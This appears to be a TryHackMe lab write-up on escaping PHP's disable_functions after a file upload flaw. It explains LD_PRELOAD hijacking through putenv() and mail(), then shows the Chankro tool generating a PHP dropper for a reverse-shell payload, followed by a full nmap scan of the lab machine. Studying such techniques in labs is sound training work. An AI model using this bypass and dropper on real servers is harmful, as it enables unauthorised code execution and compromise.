What is a file upload vulnerability?
This vulnerability occurs in web applications where there is the possibility of uploading a file without being checked by a security system that curbs potential dangers.
It allows an attacker to upload files with code (scripts such as .php, .aspx and more) and run them on the same server, more information in this room.
Why this room?
Among the typically applied measures is disabling dangerous functions that could execute operating system commands or start processes. Functions such as system() or shell_exec() are often disabled through PHP directives defined in the php.ini configuration file. Other functions, perhaps less known as dl() (which allows you to load a PHP extension dynamically), can go unnoticed by the system administrator and not be disabled. The usual thing in an intrusion test is to list which functions are enabled in case any have been forgotten.
One of the easiest techniques to implement and not very widespread is to abuse the mail() and putenv() functionalities. This technique is not new, it was already reported to PHP in 2008 by gat3way, but it still works to this day. Through the putenv() function, we can modify the environment variables, allowing us to assign the value we want to the variable LD_PRELOAD. Roughly LD_PRELOAD will allow us to pre-load a .so library before the rest of the libraries, so that if a program uses a function of a library (libc.so for example), it will execute the one in our library instead of the one it should. In this way, we can hijack or "hook" functions, modifying their behaviour at will.
Chankro: tool to evade disable_functions and open_basedir
Through Chankro, we generate a PHP script that will act as a dropper, creating on the server a .so library and the binary (a meterpreter, for example) or bash script (reverse shell, for example) that we want to execute freely, and that will later call putenv() and mail() to launch the process.
Install tool:
git clone https://github.com/TarlogicSecurity/Chankro.gitcd Chankropython2 chankro.py --help
python chankro.py --arch 64 --input c.sh --output tryhackme.php --path /var/www/html
--arch = Architecture of system victim 32 o 64.--input = file with your payload to execute--output = Name of the PHP file you are going to create; this is the file you will need to upload.--path = It is necessary to specify the absolute path where our uploaded PHP file is located. For example, if our file is located in the uploads folder DOCUMENTROOT + uploads.
My command run successfully, and I created a file in the directory with the output of the command.
Task 2.Reasy Set Go
Answer the questions below Compromise the machine and locate the flag.txt
root@ip-10-10-150-26:~# sudo nmap -sV -sC -vv -A 10.10.37.84
Starting Nmap 7.60 ( https://nmap.org ) at 2024-06-30 08:04 BST
NSE: Loaded 146 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 08:04
Completed NSE at 08:04, 0.00s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 08:04
Completed NSE at 08:04, 0.00s elapsed
Initiating ARP Ping Scan at 08:04
Scanning 10.10.37.84 [1 port]
Completed ARP Ping Scan at 08:04, 0.22s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 08:04
Completed Parallel DNS resolution of 1 host. at 08:04, 0.00s elapsed
Initiating SYN Stealth Scan at 08:04
Scanning ip-10-10-37-84.eu-west-1.compute.internal (10.10.37.84) [1000 ports]
Discovered open port 80/tcp on 10.10.37.84
Discovered open port 22/tcp on 10.10.37.84
Completed SYN Stealth Scan at 08:04, 1.27s elapsed (1000 total ports)
Initiating Service scan at 08:04
Scanning 2 services on ip-10-10-37-84.eu-west-1.compute.internal (10.10.37.84)
Completed Service scan at 08:04, 6.36s elapsed (2 services on 1 host)
Initiating OS detection (try #1) against ip-10-10-37-84.eu-west-1.compute.internal (10.10.37.84)
adjust_timeouts2: packet supposedly had rtt of -175406 microseconds. Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -175406 microseconds. Ignoring time.
NSE: Script scanning 10.10.37.84.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 08:04
Completed NSE at 08:04, 0.23s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 08:04
Completed NSE at 08:04, 0.00s elapsed
Nmap scan report for ip-10-10-37-84.eu-west-1.compute.internal (10.10.37.84)
Host is up, received arp-response (0.00043s latency).
Scanned at 2024-06-30 08:04:19 BST for 10s
Not shown: 998 closed ports
Reason: 998 resets
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 64 OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 1f:97:54:30:24:74:f2:fa:15:ed:f3:35:84:dc:6c:d0 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCimETxFw3xwql560SXGeR88EX/FNiDVNYE4k7xBkwrl7+5YctrnqdNtGrZO2Ki3Zav9TlGBjtRcQ2GOadDlKpLXasXzkiv3nl58+d/VNlhFvaQP1zK5w0f+31KrZnH9EfL9oEv1UZ6UCmJM1O4uvcxYoUOfj0HQJ/27bMGwPETSnWyxVkaBpY34vukFqrlL9HoPTQATrcmxwFSnDh0yn7tSHdNMa8vIlD4lek0q9NG10tBThCTDyXgLnE3++fkutFMSQZ/6EA1tnRFcFK+YgMCRqxTrfr0nQr5JZykseVNO+gpcUY1NDVUlCdMV0xK+WTlukJoRIyfm68P/BZmkyBT
| 256 a7:21:78:6d:a6:05:7e:5a:0f:7e:53:65:0a:c4:53:49 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBBEb8bpOpxmuRcQAiMJGyKijMw+otZD9IxXMkjgL6k2HJCA1bvpPqk7rxHbDexKDvY3MgNPAx50Mp6tttsOaVXQ=
| 256 57:1c:22:ac:59:69:62:cb:94:bd:e9:9f:67:68:23:c9 (EdDSA)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIHXfZcsCOQCeq6/HAIKcCimntv0KNHPvqXbsDiXH6WaD
80/tcp open http syn-ack ttl 64 Apache httpd 2.4.18 ((Ubuntu))
| http-methods:
|_ Supported Methods: POST OPTIONS GET HEAD
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Ecorp - Jobs
MAC Address: 02:59:D8:F7:CA:DD (Unknown)
Device type: general purpose
Running: Linux 3.X
OS CPE: cpe:/o:linux:linux_kernel:3.13
OS details: Linux 3.13
TCP/IP fingerprint:
OS:SCAN(V=7.60%E=4%D=6/30%OT=22%CT=1%CU=43299%PV=Y%DS=1%DC=D%G=Y%M=0259D8%T
OS:M=6681037D%P=x86_64-pc-linux-gnu)SEQ(SP=104%GCD=1%ISR=10A%TI=Z%CI=I%TS=8
OS:)OPS(O1=M2301ST11NW7%O2=M2301ST11NW7%O3=M2301NNT11NW7%O4=M2301ST11NW7%O5
OS:=M2301ST11NW7%O6=M2301ST11)WIN(W1=68DF%W2=68DF%W3=68DF%W4=68DF%W5=68DF%W
OS:6=68DF)ECN(R=Y%DF=Y%T=40%W=6903%O=M2301NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S
OS:=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%R
OS:D=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=
OS:0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U
OS:1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DF
OS:I=N%T=40%CD=S)
Uptime guess: 0.017 days (since Sun Jun 30 07:39:39 2024)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=260 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 0.43 ms ip-10-10-37-84.eu-west-1.compute.internal (10.10.37.84)
NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 08:04
Completed NSE at 08:04, 0.00s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 08:04
Completed NSE at 08:04, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.59 seconds
Raw packets sent: 1037 (48.028KB) | Rcvd: 1029 (43.568KB)
Now, when executing the PHP script in the web server, the necessary files will be created to execute our payload.
